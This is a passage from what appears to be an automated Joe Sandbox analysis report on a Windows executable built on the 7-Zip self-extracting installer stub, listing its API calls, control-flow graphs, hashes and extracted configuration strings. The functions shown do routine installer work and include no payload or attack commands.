                                                                    • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,00000024,004177C4,004177C4,00000000,00000024,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                                                    • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                                                    • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                    • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                    • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                    • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                    • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                                                    • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                                                    • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                                                    • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                                                    • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                                                  • wsprintfW.USER32 ref: 00405595
                                                                  • _wtol.MSVCRT ref: 004057DE
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                                                  • CoInitialize.OLE32(00000000), ref: 004059E9
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                                                  • GetKeyState.USER32(00000010), ref: 00405AA1
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                                                  • memset.MSVCRT ref: 004060AE
                                                                  • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                                                  • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                                                    • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                    • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                    • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                    • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                    • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                    • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                    • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                    • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                                                  • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                                                  • _wtol.MSVCRT ref: 00405F65
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                                                  • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerWindowlstrcpymemcmpwsprintf$AttributesCloseCommandCreateCurrentDestroyDirectoryDispatchErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateVersionWait_wcsnicmpmemmovememsetwvsprintf
                                                                  • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                                                  • API String ID: 3696187633-3058303289
                                                                  • Opcode ID: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                  • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                                                  • Opcode Fuzzy Hash: cabb4e2e52945036c720e1880f7d789d9992fedd99c9f327f88584105f760328
                                                                  • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D
                                                                  Function 00401626 Relevance: 22.8, APIs: 15, Instructions: 304COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 700 4017a2-4017a8 695->700 701 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->701 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 700->704 705 4017aa-4017ad 700->705 701->660 709 4017dc-4017df 704->709 707 4017b6-4017c2 705->707 708 4017af-4017b1 705->708 707->709 708->693 710 4017e1-4017e3 call 403354 709->710 711 4017f8-4017ff call 40301a 709->711 714 4017e8-4017eb 710->714 715 401804-401809 711->715 714->697 716 4017f1-4017f3 714->716 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 746 4018d1-4018d9 739->746 747 4018db-4018f3 call 40db53 739->747 742 40188a-40189a ??3@YAXPAX@Z 740->742 744 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 742->744 745 40189c-40189e 742->745 744->660 745->744 746->742 753 4018f5-401904 GetLastError 747->753 754 401906-40190e ??3@YAXPAX@Z 747->754 753->742 754->729
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                  • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                                                  • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                                                  • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58
                                                                  Function 0040301A Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                                                  • SetLastError.KERNEL32(00000010), ref: 0040303D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 1799206407-0
                                                                  • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                  • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                                                  • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                                                  • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                                                  Function 0040118A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                                                  • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: DiskFreeMessageSendSpace
                                                                  • String ID:
                                                                  • API String ID: 696007252-0
                                                                  • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                  • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                                                  • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                                                  • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D
                                                                  Function 00411DEF Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                  • String ID: HpA
                                                                  • API String ID: 801014965-2938899866
                                                                  • Opcode ID: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                  • Instruction ID: 158ffaedae0d42993a529c42e252781da09b2560f8e529a8c548a3e081932a5e
                                                                  • Opcode Fuzzy Hash: 9fb10d9e3a65800a4f5e1ed226729125e22e54dc21e3b7cab0738d928573cc55
                                                                  • Instruction Fuzzy Hash: 254192B0944344AFDB20DFA4DC45AEA7BB8FB09711F20452FFA51973A1D7784981CB58
                                                                  Function 00401B37 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47timewindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                                                  • CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                                                  • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                                                  • DispatchMessageW.USER32(?), ref: 00401B89
                                                                  • KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                                                  • DestroyWindow.USER32(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateDestroyDispatchHandleKillModule
                                                                  • String ID: Static
                                                                  • API String ID: 1156981321-2272013587
                                                                  • Opcode ID: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                  • Instruction ID: f02a6d563a0a994406544e3b77250aae51f77c8b940714b819f60fd1d37dc764
                                                                  • Opcode Fuzzy Hash: 3628b680e9888d51f3ede5b7fd431ea4f93bb964a28f818be4a598c22db00f11
                                                                  • Instruction Fuzzy Hash: 10F03C3250212476CA203FA69C4DEEF7E6CDB86BA2F008160B615A10D1DAB88241C6B9
                                                                  Function 0040B163 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
